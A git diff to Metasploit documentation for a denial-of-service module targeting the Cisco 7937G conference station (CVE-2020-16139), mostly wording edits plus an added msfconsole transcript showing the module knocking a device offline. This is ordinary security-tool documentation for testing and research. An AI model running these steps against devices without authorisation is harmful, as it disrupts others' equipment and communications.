diff --git a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md index 9b423652ec..80eca0cf17 100644 --- a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md +++ b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md @@ -1,7 +1,7 @@ ## Vulnerable Application [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station. - This module has been tested successfully against SCCP-1-4-5-5 and SCCP-1-4-5-7. + This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7. ### Description @@ -12,17 +12,22 @@ This module exploits a bug in how the conference station handles executing a pin 1. Obtain a Cisco 7937G Conference Station. 2. Enable Web Access on the device (default configuration). 3. Start msfconsole - 4. Do: `use auxiliary/dos/cisco/CVE-2020-16139` - 5. Do: `set RHOST 192.168.1.10` + 4. Do: `use auxiliary/dos/cisco/cve_2020_16139` + 5. Do: `set rhost 192.168.1.10` 6. Do: `run` 7. The conference station should become nonresponsive and then power cycle itself. ## Scenarios -### Cisco 7937G SCCP-1-4-5-7 +### Cisco 7937G Running Firmware Version SCCP-1-4-5-7 ``` +msf5 > use auxiliary/dos/cisco/cve_2020_16139 +msf5 auxiliary(dos/cisco/cve_2020_16139) > set rhost 192.168.110.209 +rhost => 192.168.110.209 +msf5 auxiliary(dos/cisco/cve_2020_16139) > run + [*] Starting server... -[*] 192.168.110.209 - Sending DoS packets. Stand by. +[*] 192.168.110.209 - Sending DoS Packets. Stand by. [*] 192.168.110.209 - DoS reset attack completed! [*] Auxiliary module execution completed ```